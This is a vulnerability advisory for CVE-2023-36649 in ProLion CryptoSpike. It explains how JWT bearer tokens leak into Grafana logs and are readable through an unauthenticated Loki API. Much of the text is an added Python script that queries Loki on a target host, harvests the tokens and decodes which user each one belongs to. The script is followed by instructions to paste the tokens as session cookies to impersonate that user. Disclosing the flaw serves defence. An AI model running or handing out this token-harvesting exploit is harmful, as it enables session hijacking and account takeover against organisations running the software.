Headline
CVE-2023-36649: CVCN
Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Grafana authenticated user) or from the Loki REST API without authentication.
Introduction
CryptoSpike centrally collects all its logs in a Grafana system, installed as a container in the infrastructure. These logs contain sensitive information, e.g. the JWT Bearer tokens of users connecting to the CryptoSpike web management interface. A malicious user with access only to the Grafana system could leverage the information collected in the logs to access CryptoSpike. In particular, the malicious user could capture the various JWT tokens and manually insert them into the browser cookies of an anonymous session on the CryptoSpike web management interface, thus accessing it while impersonating other users without their knowledge.
Moreover, the Grafana web interface is correctly exposed over HTTPS, but it is also reachable over plain HTTP. Finally, among the services exposed on the host network, the Loki REST API is also exposed. This API is available to unauthenticated users and gives access to all the logs that Grafana displays, completely bypassing Grafana's authentication mechanisms.
Steps to reproduce
Log in to Grafana and open the "General", "Browse", "Logs" section. Among the "Service Name" items, choose the log type called "core_services_api_gateway" of the "localhost" host. Wait a few seconds while other users navigate the web management interface, and their JWT tokens will appear as log entries of the form "Bearer [JWT TOKEN]".
To verify that the Grafana interface is exposed correctly over HTTPS behind the reverse proxy, but also incorrectly over clear-text HTTP:
- HTTP port 9000: http://LEADER_IP:9000/ (no redirect is performed, neither to HTTPS nor to another port)
- HTTPS port 443: https://LEADER_IP/monitoring
Finally, since the Loki REST API is exposed on the host network, an unauthenticated user can invoke the endpoint http://LEADER_IP:3100/loki/api/v1/query, which searches across all the logs that Grafana displays, completely bypassing Grafana's authentication mechanisms.
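The following Python script is an added example, not part of this advisory and not tooling from CVCN or ProLion. It ties together the two steps above: it builds the unauthenticated Loki instant-query URL for the "core_services_api_gateway" stream and harvests the "Bearer [JWT TOKEN]" entries from the returned log lines, decoding each token's payload (without verifying it) to show which user it would impersonate. The Loki label name `service_name`, the log-line layout, the helper names and the embedded sample response are all assumptions; the sample JWTs are constructed in the script so it runs offline. When given a LEADER_IP argument it performs the real GET against port 3100 instead.

```python
"""
Added example (not the advisory's or the vendor's code): query the
unauthenticated Loki API and harvest JWT Bearer tokens from the log lines.
Label name, log-line format and sample data are assumptions.
"""
import base64
import json
import re
import sys
import urllib.parse
import urllib.request

# Matches "Bearer <header>.<payload>.<signature>" as it appears in the gateway logs.
JWT_RE = re.compile(r"Bearer\s+([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)")


def b64url_decode(segment: str) -> bytes:
    """Base64url decode, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def jwt_claims(token: str) -> dict:
    """Decode the payload only; the signature is deliberately not verified,
    we just want to see whom the leaked token identifies."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


def loki_query_url(leader_ip: str, service_name: str = "core_services_api_gateway",
                   limit: int = 1000) -> str:
    """Build the instant-query URL from the advisory. The label name
    'service_name' is an assumption; confirm it via /loki/api/v1/labels."""
    selector = '{service_name="%s"}' % service_name
    params = urllib.parse.urlencode({"query": selector, "limit": limit})
    return "http://%s:3100/loki/api/v1/query?%s" % (leader_ip, params)


def fetch_loki(url: str, timeout: float = 10.0) -> dict:
    """Plain GET with no Authorization header: that it succeeds is the bug."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def harvest_tokens(loki_response: dict) -> list:
    """Walk Loki's 'streams' result and return one entry per distinct token,
    in first-seen order, with its decoded claims."""
    seen = {}
    for stream in loki_response.get("data", {}).get("result", []):
        for _ts, line in stream.get("values", []):
            for token in JWT_RE.findall(line):
                if token not in seen:
                    seen[token] = jwt_claims(token)
    return [{"token": t, "claims": c} for t, c in seen.items()]


def _make_token(claims: dict) -> str:
    """Constructed sample JWT; the signature is a placeholder."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    return "%s.%s.%s" % (header, body, "c2lnbmF0dXJl")


# Constructed Loki response in the real /loki/api/v1/query "streams" shape.
SAMPLE_RESPONSE = {
    "status": "success",
    "data": {"resultType": "streams", "result": [{
        "stream": {"service_name": "core_services_api_gateway", "host": "localhost"},
        "values": [
            ["1690000000000000000", "GET /api/v1/users 200 Authorization: Bearer %s"
             % _make_token({"sub": "admin", "role": "Administrator"})],
            ["1690000001000000000", "GET /api/v1/health 200"],
            ["1690000002000000000", "POST /api/v1/settings 204 Authorization: Bearer %s"
             % _make_token({"sub": "auditor", "role": "ReadOnly"})],
            ["1690000003000000000", "GET /api/v1/users 200 Authorization: Bearer %s"
             % _make_token({"sub": "admin", "role": "Administrator"})],
        ],
    }]},
}

if __name__ == "__main__":
    data = fetch_loki(loki_query_url(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    for entry in harvest_tokens(data):
        print(entry["claims"].get("sub"), entry["token"][:40] + "...")
```

Each harvested token can be pasted as the session cookie of an anonymous browser session on the CryptoSpike management interface, as described in the Introduction; the decoded `sub` claim tells you in advance which account you would be impersonating.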